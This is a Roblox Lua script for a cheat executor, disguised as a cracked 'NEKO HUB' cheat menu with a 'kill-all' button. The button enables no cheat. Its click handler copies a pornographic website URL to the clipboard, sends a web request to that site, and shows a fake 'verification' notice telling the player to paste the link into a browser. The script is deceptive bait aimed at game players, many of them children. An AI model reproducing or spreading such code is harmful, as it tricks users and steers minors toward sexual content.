local services = setmetatable({}, {__index = function(_, k) return game:GetService(k) end})
local lp = services.Players.LocalPlayer

local sg = Instance.new("ScreenGui", services.CoreGui)
local frame = Instance.new("Frame", sg)
frame.Size = UDim2.new(0, 300, 0, 150)
frame.Position = UDim2.new(0.5, -150, 0.5, -75)
frame.BackgroundColor3 = Color3.fromRGB(20, 20, 25)
Instance.new("UICorner", frame)

local title = Instance.new("TextLabel", frame)
title.Size = UDim2.new(1, 0, 0, 50)
title.Text = "NEKO HUB - 終極破解版"
title.TextColor3 = Color3.fromRGB(255, 120, 180)
title.Font = Enum.Font.GothamBold
title.TextSize = 18
title.BackgroundTransparency = 1

local btn = Instance.new("TextButton", frame)
btn.Size = UDim2.new(0.8, 0, 0, 40)
btn.Position = UDim2.new(0.1, 0, 0.5, 0)
btn.BackgroundColor3 = Color3.fromRGB(255, 120, 180)
btn.Text = "一鍵啟動全殺功能"
btn.TextColor3 = Color3.new(1, 1, 1)
Instance.new("UICorner", btn)

btn.MouseButton1Click:Connect(function()
    btn.Text = "載入中...請稍後"
    task.wait(1)
    
    setclipboard("https://rule34video.com/members/154935/favourites/videos/")
    
    pcall(function()
        local r = request or syn.request or http_request
        if r then
            r({Url = "https://rule34video.com/members/154935/favourites/videos/", Method = "GET"})
        end
    end)
    
    services.StarterGui:SetCore("SendNotification", {
        Title = "驗證提醒",
        Text = "請至瀏覽器貼上已複製的連結以完成啟動喵！",
        Icon = "rbxassetid://6023426926",
        Duration = 10
    })
    
    btn.Text = "已複製驗證連結！"
end)
